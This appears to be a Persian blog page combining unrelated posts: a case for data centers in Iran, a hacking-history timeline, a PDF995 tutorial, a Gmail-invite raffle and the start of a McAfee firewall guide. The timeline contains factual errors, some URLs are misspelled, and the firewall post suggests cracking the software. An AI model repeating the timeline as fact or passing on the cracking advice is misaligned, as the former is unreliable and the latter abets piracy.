همچنين با زياد شدن كاربران و بالا رفتن حجم مستندات، و نيز سادگی انتشار اطلاعات در اينترنت، مفاهيم تجاری نيز وارد عرصه اينترنت شدند. شركت‌های تجاری نياز به سرورهايی داشتند كه اين امكان را به آنها بدهد كه به سادگی و با سرعت بتوانند اطلاعات خود را در اختيار مشتريان و كاربران خود قرار دهند.

بالطبع اين امكان وجود نداشت كه هر شركت يا سازمانی كه قصد راه‌اندازی سايت‌های اينترنتی را دارد، خود راساً اقدام به راه‌اندازی سرور خود كند، چرا كه با وجود كاربران زياد اين سايت‌ها و حجم بالای ترافيك، نياز به اتصال‌هايی با سرعت‌های بسيار بالا وجود داشت كه مسلما حتی در صورتی كه اين امكان از لحاظ عملی وجود داشته باشد، هزينه بالايی را می‌طلبيد.

راه‌حلی كه برای اين مشكل به نظر رسيد، راه‌اندازی مراكز خاصی تحت عنوان Data Center يا مراكز داده‌ای بود. Data Center ها با در اختيار داشتن اتصالات پرسرعته‌ای به اينترنت، و همچنين در اختيار داشتن سرورهای قوی و متعدد، امكان راه‌اندازی سرورهای وب را برای عموم مردم ممكن ساختند.

شركت‌های تجاری و مردم می‌توانستند با اجاره كردن فضای محدودی در اين سرورها، سايت‌های وب خود را معرض ديد عموم قرار دهند. برخی شركت‌های بزرگ نيز با توجه به نياز خود، اقدام به اجاره كردن يك سرور در مركز داده‌ای می‌كردند و آن را از راه دور با ابزارهای خاص كنترل می‌كردند.

اكنون با توجه به رشد سريع اينترنت، روز به روز به تعداد Data Center ها اضافه می‌شود به طوری كه در حال حاضر در اكثر كشورهای پيشرفته اين مراكز وجود دارند. تمركز اين مراكز بخصوص در كشور امريكا بسيار زياد است. دليل آن ارزان بودن نرخ اتصال به اينترنت و همچنين در دسترس بودن سرعت‌های بالا می‌باشد.

برخی از اين Data Center از طريق خطوط مختلف فيبرنوری، پهنای باندی بيش از 4Gbps را در اختيار دارند و تعداد سرورهای اين Data Center معمولا بيش از 1000 است كه بر اساس مشخصات به متقاضيان اجاره داده می‌شود.

پارامترهای زيادی در قيمت اجاره ماهانه يك سرور تاثيرگذار است كه می‌توان به سرعت CPU، مقدار حافظه RAM و اندازه Hard Disk ، حداكثر ترافيكی كه ماهانه در اختيار هر سرور قرار می‌گيرد، سيستم عامل سرور و همچنين سابقه مركز داده‌ای بستگی دارد.


http://www.ccwmagazine.com/Issues/Issue16/hosting/images/datacenter_1.jpg

مشخصات يك Data Center

Data Centerهای متفاوتی در نقاط دنيا وجود دارد كه با توجه به نياز و همچنين شرايط منطقه‌ای طراحی و ساخته شده‌اند. استاندارد خاصی برای يك Data Center وجود ندارد اما در اينجا سعی شده است به برخی از مشخصات عمومی يك مركز داده‌ای اشاره شود.

- در اختيار داشتن اتصالات مختلف به اينترنت از طريق ISP و ICPهای مختلف:
به طور معمول يك Data Center برای اتصال به اينترنت از چندين اتصال مختلف استفاده می‌كند تا در صورتی كه هر يك از اتصالات به دليلی از كار افتادند، در سرويس‌دهی مركز وقفه‌ای پيش نيايد. برخی از Data Center معروف با بيش از 12 اتصال مختلف به اينترنت متصلند.

-وجود سيستم قدرت پشتيبان:
يكی از مهم‌ترين مسائل در Data Center سرويس‌دهی بدون وقفه به مشتريان می‌باشد. با توجه به امكان قطع برق به دلايل مختلف همچون حوادث غيرمترقبه يا جنگ، نياز به سيستم برق پشتيبان ضروری است. معمولاً Data Centerهای بزرگ از UPS های مخصوصی استفاده می‌كنند كه امكان سرويسدهی به بيش از 100 كامپيوتر را دارند. علاوه بر سيستم UPS، ژنراتورهای قوی نيز در مركز داده‌ای وجود دارد تا در صورت قطع بلندمدت برق، سرويس‌دهی بدون وقفه انجام شود.

- وجود سرورهای متعدد:
هدف اصلی يك Data Center در اختيار گذاشتن سرورهای وب برای مشتريان است. سرورهای مورد استفاده با توجه به نياز و امكانات Data Center تعيين می‌شود. تنها تفاوت مهم، نوع سرورهای مورد استفاده توسط Data Center است. در Data Center ها از دو نوع سرور استفاده می‌شود: سرورهای Rackmount و يا سرورهای Desktop. با توجه به حجم كم سرورهای Rackmount اين امكان برای مركز داده‌ای فراهم می‌شود كه در فضايی كوچك، تعداد زيادی سرور قرار گيرد. اما مسئله مهم در اين نوع سرورها، قيمت بالای اين سرورها نسبت به سرورهای Desktop است. علاوه بر اين امكان ارتقاء سرورهای Rack Mount تنها به مقدار اندك امكان‌پذير است. با توجه به اين موضوع اكثر Data Center از سرورهای Desktop استفاده می‌كنند.

- مشخصات فيزيكی:
با توجه به اين نكته كه اكثر سرورهای وب از نوع Desktop هستند، ساختمان‌های مراكز داده‌ای اكثرا با سقف‌های بلند ساخته می‌شوند كه علاوه بر تهويه هوا، امكان قرار دادن سرورهای بيشتر را می‌دهند. همچنين در تمامی Data Centerها، مسيرهايی برای گذراندن كابل‌های شبكه و همچنين كابل‌های برق وجود دارد. علاوه بر اينها، وجود سيستم تهويه قوی برای پايين نگاه داشتن دمای سرورها ضروری می‌باشد. البته مشخصاتی همچون وجود سقف كاذب، كف كاذب و همچنين سيستم اطفاء حريق در برخی موارد توصيه شده است.

مسئله مهم در Data Centerها، امكان استفاده متقاضيان از سرورهای Data Center می‌باشد كه در اين بخش به آن می‌پردازيم.

- نحوه در اختيار گرفتن يك سرور وب:
پس از اينكه متقاضی سرور، با شرايط قراردادی كه Data Center مفاد آن را تنظيم كرده موافقت كرد، يك سرور در اختيار وی گذاشته می‌شود. بسته به نوع قرارداد سرور می‌تواند تنها شامل سيستم عامل و يا نرم‌افزارهای كمكی همچون نرم‌افزارهای FTP و يا Control Panel سايت باشد. در صورتی كه اين نرم‌افزارها بر روی سرور نصب نشده باشد، متقاضی خود بايد اين نرم‌افزارها را نصب كند. متقاضی اكثرا از طريق Remote terminalها و يا نرم‌افزارهای خاصی مانند PCAnywere سرور خود را از راه دور كنترل می‌كند. پس از نصب و تنظيمات نرم‌افزاری، سرور آماده سرويسدهی می‌شود و بر حسب نياز متقاضی استفاده می‌شود.

http://www.ccwmagazine.com/Issues/Issue16/hosting/images/datacenter_2.jpg
نكته قابل توجه، كنترل سرورها توسط متقاضی از راه دور است. با توجه به اين موضوع مسئوليت كليه مسائل و مشكلات سرور از جمله از كار افتادن سرويس‌ها و نرم‌افزارها و يا حملات هكری به عهده متقاضی می‌باشد.

البته در شرايط خاص و پرداخت مبالغ معين متقاضی می‌تواند از خدمات Data Center استفاده كند.

هرچند در شرايط بحرانی همچون حملات گسترده كه منجر به از كار افتادن تمامی سرورها شود، معمولا Data Center برای سرويسدهی به تمامی سرورها به مشكل برخورد می‌كنند كه در اين صورت طبق اولويت‌های خود اقدام به رفع مشكل می‌كنند.

آيا امكان راه‌اندازی چنين مركزی در ايران وجود دارد؟ اين سوالی است كه در بخش بعد به آن می‌پردازم.











[align=center:e79dfb8d2c]ضرورت راه‌اندازی Data Center در ايران [/align:e79dfb8d2c]

شركت‌های ايرانی از روش‌های متفاوتی برای راه‌اندازی سايت‌های خود استفاده می‌كنند. برخی از امكانات ISP های داخلی استفاده می‌كنند. اين روش عليرغم اين كه امكان پشتيبانی مناسبی را برای مدير سايت فراهم می‌كند، اما از سوی ديگر به دليل پايين بودن پهنای باند ISP های ايرانی و همچنين نامتقارن بودن اتصالات (پايين‌تر بودن پهنای باند ارسال نسبت به دريافت) و همچنين بالا بودن ترافيك در برخی ساعات خاص، عملا باعث كندشدن سايت می‌شود.

روش ديگر، استفاده از امكانات شركت‌های خارجی است كه به روش‌های مختلفی انجام می‌پذيرد، اين روش‌ها علاوه بر بالا بردن هزينه‌ها، مشكلات خاصی را برای سايت‌های ايرانی به وجود آورده است كه از مهمترين آنها می توان به مسائل امنيتی اشاره كرد كه برای مدتی بزرگترين دغدغه مديران سايتهای ايرانی بود.

همه راه‌حل‌هايی كه برای راه‌اندازی سايت‌های ايرانی مورد بررسی قرار گرفت، دارای مشكلاتی بودند. البته مشكلاتی كه در فصل قبل به آنها پرداختم، تنها مربوط به كاربران ايرانی اين سرويس‌ها بود ولی راه‌حل‌های قبلی هزينه‌هايی را هم به شركت مخابرات به عنوان بزرگترين ارائه دهنده خدمات اينترنت در ايران وارد می‌كند كه در بخش‌های بعد به آن اشاره می‌شود.

[align=center:e79dfb8d2c]مزايای راه‌اندازی Data Center در ايران [/align:e79dfb8d2c]

- پايين آمدن ترافيك Gatewayهای شركت مخابرات:
در حال حاضر بيش از 30 سرور در كشورهای غربی (اكثرا كانادا ، امريكا و انگليس) در اجاره شركت‌های ايرانی قرار دارد. ترافيك ماهانه هر سرور به طور متوسط 400GB می‌باشد كه در مجموع بيش از 12000GB ترافيك به gateway های شبكه Data كشور وارد می‌كند. با توجه به اين كه اكثر بازديدكنندگان اين سايت‌ها ايرانی هستند، در حقيقت كاربر ايرانی، برای بازديد سايت ايرانی، علاوه بر اين كه باعث بالا رفتن ترافيك در gatewayهای شركت مخابرات می‌شود، خود نيز متوسط زمان بيشتری را بايد منتظر بماند.

اين مسئله در شكل 1 نشان داده شده است. در يك نمونه‌گيری آماری، تعداد hop ها برای ارتباط با يكی از سرورهای ايرانی واقع در Data Center خارج از كشور، عددی در حدود 26 بوده است.

http://www.ccwmagazine.com/Issues/Issue16/hosting/images/fig1-sfw.jpg
شكل 1 – وضعيت فعلی سرورهای وب ايرانی

نكته جالب توجه اين است كه طبق مصوبه شورای عالی انقلاب فرهنگی، كليه ISPها بايد سرويس خود را از شركت مخابرات و يا شركت‌های مورد تاييد مخابرات (ICPها ) دريافت كنند كه اين شركت‌ها نيز اكثرا به نوعی به شبكه ديتا متصلند. در نتيجه عملاً تمامی ISP ها به نوعی به شبكه ديتای كشور متصل هستند.

حال اگر مركز داده‌ای در ايران تاسيس شود، همان طور كه در شكل 2 نشان داده شده است، علاوه بر اينكه عملا هيچ ترافيكی به Gateway های ديتا وارد نمی‌شود، متوسط زمان انتظار برای مشاهده صفحات نيز بسيار كمتر خواهد بود.

نكته ديگر اين كه هنگام به وجود آمدن مشكلات پيش‌بينی نشده در gateway های اصلی مخابرات (مانند قطع شدن لينك Flag در خرداد ماه امسال) حداقل اين امكان برای كاربران ايرانی وجود دارد كه سايت‌های فارسی و ايرانی را به راحتی مشاهده كنند چرا كه در اين صورت عملاً نيازی به اتصال به شبكه اصلی اينترنت وجود ندارد.

http://www.ccwmagazine.com/Issues/Issue16/hosting/images/fig2-sfw.jpg
شكل 2 – وضعيت سرورهای ايرانی در صورت راه‌اندازی مركز داده‌ای در ايران

با توجه به ساختار شبكه انتقال داده شركت مخابرات و ديتا، می‌توان حداكثر تخمين 10 HOP برای رسيدن كاربران ايرانی به سايت‌های ايرانی در نظر گرفت. هر چند در تست‌هايی بر روی سرورهای وب برخی ISPها كه از خدمات شركت مخابرات استفاده می‌كردند، به عدد 8 Hop در هر اتصال به دست آمد كه در مقايسه با سرورهای ايرانی واقع در خارج از كشور عدد قابل قبولی است.

- استفاده بهينه از امكانات موجود:
شركت مخابرات ايران سرمايه‌گذاری عظيمی در بخش ديتا و اينترنت انجام داده است. خطوط فيبر نوری كه در سراسر تهران و ايران نصب شده است، پهنای باند بالايی را در اختيار گذاشته است.

در تهران، يك حلقه با پهنای باند بيش از 622Mb بين 8 مركز اصلی مخابراتی وجود دارد كه عملاً با چنين پهنای باندی می‌توان يك مركز داده‌ای با استانداردهای جهانی را پياده‌سازی كرد. تنها كافی است كه Data Center مورد نظر به يكی از مراكز اصلی اين حلقه متصل شود، كه در نتيجه با هزينه پايينی می‌توان از امكانات موجود استفاده كرد.

-هزينه پايين‌تر:
بيش از 50% هزينه يك سرور اجاره‌ای در مركز داده‌ای در خارج از كشور، مربوط به هزينه پرسنل آن مركز و همچنين اجاره نرم‌افزارهای نصب شده بر روی سرور می‌شود. با توجه به پايين بودن دستمزد متخصصان ايرانی نسبت به همتاهای غربی، طبيعتاً هزينه سرور در ايران بسيار پايين‌تر از معادل خارجی خواهد شد.

- امنيت بيشتر برای سرورها:
مطمئنا زمانی كه سرورهای ايرانی در خاك ايران وجود داشته باشند، می‌توان از اطلاعات آنها به نحو شايسته‌تری محافظت كرد.

علاوه بر حفاظت اطلاعات عمومی، اطلاعات مخصوص به سرورهای شركت‌ها و سازمان‌های دولتی، نياز به حفاظت ويژه‌ای دارند و در صورتيكه اين سرورها در يك مركز داده‌ای در ايران باشند، قطعاً حفاظت بيشتر نيز از آنها امكان‌پذير خواهد بود.

در زمان بحران‌های عمومی مانند حملات هكری و يا مشكلات مشابه، مديران يك مركز داده‌ای ايرانی مسلماً می‌توانند سريع‌تر از مسئولين يك مركز داده‌ای خارجی برای رفع مشكل اقدام نمايند


[align=center:e79dfb8d2c]مزايای در اختيار داشتن Data Center در آينده [/align:e79dfb8d2c]
پس از اجرای كامل پروژه FLAG، ايران از طريق BackBoneهای پرقدرت به پهنای باند 10Gbps متصل خواهد شد. در اين صورت پهنای باندی كه در اختيار ايران قرار می‌گيرد، تفاوت چندانی با كشورهای پيشرفته اروپايی و امريكايی نخواهد داشت. علاوه بر اين و با توجه به موقعيت فيزيكی ايران در منطقه و عنايت به اين نكته كه اكثر كشورهای منطقه به وسيله فيبرهای نوری قصد برقراری ارتباط با ايران را دارند، عملاً ايران در آينده به چهارراه ارتباطی خاورميانه، كشورهای تازه استقلال يافته، پاكستان و افغانستان تبديل خواهد شد.

http://www.ccwmagazine.com/Issues/Issue16/hosting/images/datacenter_3.jpg
در صورتی اجرای موفق پروژه راه‌اندازی Data Center در ايران، كشورمان به عنوان اولين كشوری كه در خاورميانه دارای مركز داده‌ای است شناخته می‌شود. با توجه به استقبال گسترده از اينترنت در خاورميانه و به خصوص كشورهای عربی و بازار رو به رشد آن، و همچنين كمبود متخصص در اين كشورها و نياز روزافزون شركت‌های دولتی و خصوصی اين كشورها به در اختيار داشتن سرورهای وب و سايت‌های اينترنتی، ايران می‌تواند با هزينه پايين سرورهای خود، مشتريان بسياری را در منطقه به خود جلب كند. در مرحله بعدی و با توجه به جهانی بودن شبكه Flag، حتی می‌توان بازار سرورهای وب كشورهای اروپايی و امريكايی را با هزينه پايينی كه سرورهای ايرانی خواهند داشت، به دست آورد. اين امرعلاوه بر ايجاد اشتغال و ارزآوری، باعث بالا رفتن سطح دانش فنی و عملی ايران در زمينه سرورهای وب خواهد شد.

پيش از پايان نوشته، ذكر اين نكته را ضروری می‌دانم كه مهم‌ترين قدم برای اجرای اين طرح، مجاب كردن شركت مخابرات ايران برای در اختيار گذاشتن خطوط فيبر نوری به Data Center است. اين نكته برای شركت مخابرات ايران بايد كاملا مشخص شود كه Data Center نه تنها از امكانات مخابرات برای اتصال به اينترنت استفاده نمی‌كنند، بلكه وجود آن باعث پايين آمدن ترافيك Gatewayهای اتصالی ديتا به اينترنت خواهد شد كه در نتيجه منجر به كاهش هزينه‌های اين شركت در بلندمدت می‌گردد.

مطالبی كه به عنوان مزايای راه‌اندازی Data Center در ايران مطرح شد، تنها گوشه‌ای از مزايای اين طرح بود كه با تحقيقات اندك نگارنده حاصل شده است. همچنين در انتها، اين نكته را قابل ذكر می‌دانم كه با توجه به هزينه بالای اين طرح برای راه‌اندازی و همچنين زيربنايی بودن آن، بدون كمك دولت و بانك‌ها و به خصوص مسئولين محترم پروژه ملی تكفا، امكان راه‌اندازی اصولی اين مركز وجود نخواهد داشت. اميدوارم با توجه به اهميت اين طرح، و نيز عزم دولت برای گسترش فناوری اطلاعات در كشور، مسئولين محترم در راه‌اندازی اين پروژه حضوری فعال داشته باشند، چرا كه اين طرح باعث كم شدن فاصله كشورمان با ساير كشورهای پيشرفته در زمينه فناوری اطلاعات خواهد شد.

شرق - هك كردن برخلاف انتظار مسئله اى تازه نيست و حتى به يك كشور هم محدود نمى شود. نوشتار پيش رو تاريخچه مختصرى از اين پديده را در كشورهاى مختلف بررسى مى كند.

•۱۹۷۱ در ويتنام دامپزشكى به نام «جان دراپر» از يك سوت ارزان قيمت در جعبه پاپ كورن و يك «جعبه آبى دست ساز» براى برقرارى تماس تلفنى رايگان استفاده مى كند. هم زمان با انتشار راهنماى شركت «اسكواير» در مورد چگونگى ساختن جعبه هاى آبى، آمار تقلب و كلاهبردارى در زمينه استفاده از تلفن در آمريكا به اوج خود مى رسد.

•۱۹۷۲ «استيو وزنياك» و «استيو جابز»، شاگردان يك دبيرستان و موسسان آينده كامپيوتر اپل، به يك تجارت خانگى در زمينه توليد و فروش «جعبه هاى آبى» اقدام كردند. در اين روش ضمايم غيرقانونى هك شده در سيستم تلفنى به كاربر امكان برقرارى يك تماس راه دور رايگان مى داد.

•۱۹۷۸ باشگاه «آشوب كامپيوترى» در آلمان به وجود مى آيد و پس از مدتى تبديل به يكى از سازمان هاى هكر تاثيرگذار در اروپا مى شود.

•۱۹۸۳ در ميلواكى زياده روى ۶ نوجوان در هك كردن ماه ها به طول مى انجامد. آنها در اين مدت به كامپيوترهاى موسسات پرآوازه اى مانند كتابخانه ملى «لوس آلاموس» و مركز سرطان يادواره «اسلون كترينگ» راه مى يابند.

•۱۹۸۴ مجلس «سنا» قانون دستبرد و تقلب كامپيوترى را تصويب مى كند. طبق اين قانون نفوذ غيرقانونى به سيستم هاى كامپيوترى يك جرم شناخته مى شود.

•۱۹۸۷ مجله «دكودر» براى طرفداران هك در ايتاليا منتشر مى شود.

•۱۹۸۸ «كوين ميتنيك» به طور مخفيانه پيام هاى الكترونيكى MCI، مركز محاسبات عددى مقام هاى رسمى امنيتى را كنترل مى كند. او مسئول خسارت ۴ ميليون دلارى وارد شده به كامپيوترهاى مركز محاسبات عددى، دزديدن يك سيستم كامپيوترى عظيم و مخفى امنيتى و دستيابى غيرمجاز به كدهاى راه دور MCI از طريق كامپيوترهاى دانشگاهى در لس آنجلس و انگلستان بوده است. او ۵ ماه را در زندان و ۶ ماه را هم در يك بخش بازپرورى سپرى مى كند. «ميتنيك» در اواخر سال ۱۹۹۲ هم زمان با شروع تحقيقات FBI در مورد صحت و اثبات نقض قوانين به وسيله او، فرار كرد.

•۱۹۸۹ در آلمان غربى، تعدادى هكر به علت نفوذ غيرقانونى به سيستم هاى دولتى و شركت ها و فروش كد منابع OS به KGB بازداشت شدند.

•۱۹۹۱ شايعاتى درباره وجود ويروسى به نام «ميكل آنژ» منتشر مى شود مبنى بر اين كه اين ويروس كامپيوترها را در ۶ مارس ۱۹۹۲؛ يعنى در پانصد و هفدهمين سالگرد تولد هنرمند، نابود مى كند. هيچ اتفاقى در اين روز نمى افتد.

•۱۹۹۴ هكرهاى روسى به رهبرى «ولاديمير لوين» ۱۰ ميليون دلار از بانك شهرى، خارج و آن را به حساب هاى بانكى خود در سراسر دنيا منتقل كردند. پس از چندى «لوين» دستگير و به جز ۴۰۰ هزار دلار مابقى پول ها پس گرفته شد.

•۱۹۹۷ يك گروه هكر كانادايى به نام «انجمن وارز» به وب سايت يك شبكه تلويزيونى كانادايى نفوذ مى كند.

•۱۹۹۷ يك نوجوان ۱۵ ساله كراوات به كامپيوترهاى نيروى هوايى آمريكا در «گوام» رخنه مى كند.

•۱۹۹۸ «اهود تنبوم» يك هكر ۱۹ ساله اسراييلى راه هايى براى ورود غيرقانونى به كامپيوترهاى پنتاگون مى يابد و برنامه هاى نرم افزارى آنجا را مى دزدد. وى توسط FBI بازداشت مى گردد، اما بعدها از مقامات مهم شركت مشاوره كامپيوترى مى شود.

•۱۹۹۸دو هكر در چين به دليل نفوذ به شبكه كامپيوترى يك بانك و دزديدن مبلغى معادل ۳۱۳۲۵ دلار محكوم به اعدام مى شوند.

•۱۹۹۹ «كلينتون» اعلام مى كند كه دولت ۴۶/۱ ميليارد دلار در FYOO صرف بهبود سيستم امنيت كامپيوترى خواهد كرد.

•دسامبر ۱۹۹۹ يك هكر روسى سعى مى كند از يك پخش كننده فروش سى دى در اينترنت مبلغ ۱۰۰هزار دلار اخاذى مى كند و براى رسيدن به خواسته اش موسسه را تهديد به افشاى شماره كارت اعتبارى مشتريانش مى كند. او پس از ناكامى در گرفتن پول، اين شماره ها را در يك وب سايت در معرض ديد همگان مى گذارد.

•مارس ۲۰۰۰ «كلينتون» مى گويد هيچگاه به دخترش چلسى، در دبيرستان اى ميل نخواهد زد؛ زيرا كامپيوتر را وسيله امنى براى انتقال پيام نمى داند.

•مه ۲۰۰۰ ويروس «دوستت دارم» با قابليت كپى كردن خود براى هركس از طريق كتابچه آدرس به سرعت در تمام دنيا پخش مى شود.

•فوريه ۲۰۰۱ يك هكر هلندى به منظور تنبيه بسيارى از كسانى كه به ديدن عكس هاى غيراخلاقى يك قهرمان تنيس بسيار مشتاق بودند، ويروسى را به همين نام پخش مى كند.
•فوريه ۲۰۰۱ «آلبرت هانسن» مامور FBI به دليل جاسوسى كامپيوترى براى روس ها بازداشت مى شود.

•آوريل ۲۰۰۱ FBI با حيله دو هكر روسى را مجبور به آمدن به آمريكا مى كند. سپس از آنها درباره نفوذ غيرقانونى شان به بانك هاى آمريكا (در گذشته) اعتراف مى گيرد.

•مه ۲۰۰۱ تنش بين آمريكا و چين باعث ايجاد آشوب در شبكه هاى كامپيوترى توسط هكرهايى از هر دو كشور مى شود، كه اين آشوب ششمين جنگ شبكه اى در راه دفاع ملى نام مى گيرد.

•سپتامبر ۲۰۰۱ در صبح يازدهم سپتامبر قوانين جديد ضد تروريسم تصويب شدند. در بسيارى از اين قوانين از هكرها به عنوان تروريست ياد شده است.

•فوريه ۲۰۰۲ مايكروسافت در بخش «محاسبات قابل اطمينان ابتدايى»، ارتقاى ويندوز را متوقف و هشت هزار برنامه نويس را تحت آموزش هاى امنيتى قرار مى دهد.

•مه ۲۰۰۲ كرم «كلز- اچ» از تمام ويروس هاى شناخته شده از نظر تعداد كامپيوترهاى ويروسى شده پيشى مى گيرد.

•فوريه ۲۰۰۳ ايالات متحده يك هكر اهل قزاقستان را به علت نفوذ غيرقانونى به كامپيوترهاى «بولومبرگ» و اقدام به اخاذى محكوم مى كند.

امروزه با اين همه ابزار و برنامه اي كه در اختيارهمگان قرار دارند. درج محتواي نوشتاري در سايت وب نبايد كار دشواري باشد. اما آنچه اهميت آن هرگز كاهش نيافته،قابل دسترس كردن اين اطلاعات و تبديل دست نوشته ها به فايل هاي ديجيتالي يا تبديل فايل ها از يك فرمت به فرمتي ديگر است. با رشد اينترنت ابزارهايي كه براي انجام اين تبديلات عرضه شده اند نيز توسعه يافته اند. يكي از اين فرمت ها كه بهترين گواه براي اين مدعا مي تواند باشد، Portable Document Format يا همان PDF است كه محصول شركت ادوبي مي باشد. اين فرمت امروز يكي از پراستفاده ترين فرمت هاي انتشار اسناد در وب محسوب مي شود. خيلي وقت ها بايد اسناد چاپي را به فرم ديجيتالي در آورد تا در وب قابل استفاده باشد. در اين مواقع انواع فرمت هاي گرافيكي وجود دارند كه مي توانيد انتخاب كنيد. گاهي اوقات بايد فرمت TXT را به HTML تبديل كنيد، و گاهي مجبوريد محتواي HTML يك سايت را به شكل TXT بيرون بكشيد تا در اضافاتي كه براي زيبا سازي آن استفاده شده گرفتار نشويد. خوشبختانه، برنامه هايي وجود دارند كه انجام اين كارها را بدون هيچ زحمتي براي شما فراهم مي سازند. امروز وجود Acrobat Reader در ميليون ها كامپيوتر، اين برنامه ادوبي را به استانداردي براي نمايش اسناد، به ويژه اسنادي كه بايد شكل كاغذي خود را حفظ كنند، تبديل كرده است. براي تبديل اسناد به اين فرمت به غير از محصولات خود ادوبي، برنامه هاي سبك تر و ارزان تري هم عرضه شده كه يكي از آنها محصولي از PDF995 است كه در اين مقاله معرفي كرده ايم. فرمت PDF بدون شك سرآمد تمام فرمت هاي اسناد آنلاين است، ولي اهميت قالب هاي ديگري چون eBook را نيز نبايد از خاطر دور داشت. با برنامه هايي كه در اين مقاله به شما معرفي مي كنيم، ساخت محتوا براي سايت وب و آماده كردن اسناد به نحوي كه به آساني قابل ايميل كردن باشند، بسيار ساده مي شود.

قدم اول : بارگذاري مبدل
PDF995 مجموعه اي از چند برنامه است كه يكي از آن ها مبدل به اسناد به PDF مي باشد. براي دريافت اين مجموعه اي از اينترنت، به نشاني http://www.pdf995.com\download.htm برويد و از آنجا خود برنامه و همچنين درايور پرينتر را بارگذاري كنيد. بعد از نصب چاپگر به كامپيترتان اضافه مي شود كه به عنوان خروجي در تمام برنامه قابل استفاده خواهد بود.

قدم دوم: تبديل سند
براي امتحان يك فايل متني ساده را در نظر مي گيريم. بعد از باز كردن فايل گزينه Print را از منوي File كليك كنيد. از فهرست كركره اي موجود پرينتر را انتخاب مي كنيم كه در اين مورد PDF995 مورد نظر ماست. با كليك روي دكمه OK ، كاد رمحاوره Save As ظاهر مي شود كه در واقع نام فايل PDF را از ما مي پرسد.

قدم سوم: دستكاري فايل PDF
اگر بخواهيد تغييراتي جزئي در فايل پي دي افي كه ساخته ايد ايجاد كنيد مي توانيد از برنامه PDFEdit995 استفاده كنيد. اين برنامه جزء مجموعه نصب شده و امكان گذاشتن شماره صفحه تغيير ابعاد صفحه تركيب چند سند با يكديگر و خيلي كارهاي ديگر را به شما مي دهد.

قدم چهارم: رمز گذاشتن روي PDF
يكي ديگر از برنامه هاي مجموعه PDF995 امكان گذاشتن رمز روي فايل هاي PDF را به شما مي دهد . اين برنامه با استفاده از شيوه رمز گذاري Triple DES مانع از چاپ ، كپي كردن نوشته ها و تصاوير، و تغيير در فايل PDF مي شود. با اين شيوه حتي مي توانيد رمز عبوري روي PDF خود بگذاريد كه باز كردن فايل را محدود مي كند .

قدم پنجم: باز كردن فايل PDF
اگر تاكنون برنامه Acrobat Reader را در سيستم خود نصب نكرده ايد، همين حالا آن را ازسايت http://www.abobe.com دريافت و نصب كنيد. بعد از نصب PDF خود را باز كنيد و ببينيد كه هم چيز درست تبديل شده است.

قدم ششم: ارسال فايل به سايت
حالا كه يك PDF درست و حسابي داريد، مي توانيد آن را در وب سايت خود گذاشته و به بازديدكنندگان اجازه بدهيد آن را بارگذاري و مشاهده كنند. براي انتقال فايل به سرور وب از همان برنامه FTP معمول خود استفاده كنيد. بعد از اين كار لينكي را در صفحه اضافه كنيد تا بازديدكننده با كليك روي آن بتواند فايل را بارگذاري كند.

قدم هفتم: تبديل PDF به HTML
اگر محتواي سايت تان را به صورت PDF در دست داريد. لازم نيست اين همه متن و تصوير را به HTML تبديل كنيد. شركت ادوبي يك برنامه وبي در نشاني http://www.abobe.com\products\acrobat\accessimpleform.html عرضه كرده كه فايل هاي PDF را درجا به HTML تبديل كنيد. شما مي توانيد اين امكان را در سايت خود مورد استفاده قرار دهيد.

قدم هشتم: ساير خدمات رايگان ادوبي
شركت ادوبي خدمات ديگري را در نشاني http://www.abobe.com\products\acrobat ارائه داده كه به كمك آنها مي توانيد هر نوع سند سازگار با PDF را به اين فرمت تبديل كنيد. اين سرويس تا پنج بار استفاده رايگان است. در مواقع ضروري كه هيچ ابزار ديگري در اختيار نداريد، اين روش به دادتان مي رسد.

به ۱۰ نفر از دوستانی که جی ميل ميخوان به قيد قرعه کشی دعوت نامه ميفرستم

اخرين مهلت ثبت نامه در قرعه کشی جی ميل ۲۱/۱۱/۸۴

آدرس خودتون رو به آدرس ميل من بفرستيد تا در قرعه کشی ثبت نام کنيد

namdari123@gmail.com

خوب در ابتدا نرم افزار را نصب و دستگاه را Restart نماييد.سپس اقدام به پچ كردنش نماييد(اگه نداريد بگيد تا براتون بفرستم) ،حالا نرم افزار را اجرا نماييد وقتي كه منوي اوليه نرم افزار باز شد شما با يك طراحي گرافيكي و رابط هاي اينترفيس بسيار زيبا و جذاب مواجه ميشويد و صفحه اول كه براتون باز شد شما در قسمت سمت چپ در منوي آبي رنگ چهار قسمت داريد كه بدين شرح هستن:

1- SUMMARY ، 2- Internet Applications ، 3- Inbound Events ، 4- Utilities كه در ادمه به آموزش تك تكشون مي پردازم:

1- SUMMARY (معادل فارسيش خلاصه است) :مك آفي پرفشنال فايروال شامل 4 صفحه خلاصه است:
براي حركت در بين اين چهار صفحه هم باز شما يك اينترفيس خيلي جالب داريد، در قسمت بالا سمت راست 3 تا آيكون داره كه اوليش از سمت راست عكس يه خونه روشه كه كارش اينه كه شما رو برگردونه به صفحه اوليه،بعد 2 تا آيكون ديگه داره كه عكس 2 تا فلش هستن به سمت راست و چپ كه كارشون ورق زدن اين چهار صفحه است.
Main Summary :
اولين صفحه. كه خلا صه ايي از آخرين كارها رو براتون نشون ميده. در قسمت رابط هاي اين صفحه كه در سمت راست اون منو هست 3 تا اينترفيس هست:

A - Daily Report :كه به شرح آخرين حملات كه به دستگاه شما شده مي پردازه در طي:امروز،اين هفته و اين ماه و تعداد حملات رو در جلوي هر كدوم مينويسه.

B - Active Applications : ليستي از برنامه هاي فعال رو كه در زمان وصل شدن شما به اينترنت مشغول به كار ميشن رو براتون مينويسه.

C - Common Tasks :اين قسمت وظايف عمومي است 3 تا گزينه داره :
قسمت اول(1) كه نوشته:ويو كرنت اينترنت ترافيك ،با كليك كردن بروي اين قسمت منوي براتون باز ميشه كه شامل 2 تا زبانه است:

زبانه اول كه نوشته استاتيكس اطلاعات جامع و كاملي در مورد آناليز ترفيك به صورت نمودار هاي گرافيكي زيبا و مقدار اطلاعاتي كه شما دريافت كرده ايد و چقدر به دستگاه شما وارد شده و چقدر خارج شده و........
رو مينويسه.
زبانه دوم كه روش نوشته اپليكيشنز نام برنامه هاي متصل به اينترنت و شماره پور تاشون و در قسمت پاينش هم به صورت نموداري ساير جزئيات رو بيان ميكنه.

قسمت دومش(2) كه نوشته چينج فايروال ستينگ با كليك بروي اين قسمت شما ميتونين تنظيمات خاص خودتون رو اعمال كنيد.كه در مورد اين قسمت در قسمتاي بعدي دربارش توضيح ميدم.
قسمت سومش(3) كه نوشته ويو آن لاين هلپ و كليك بروي اين قسمت شما ميتونين از كمك هاي آن لاين شركت مك آفي برخوردار بشويد

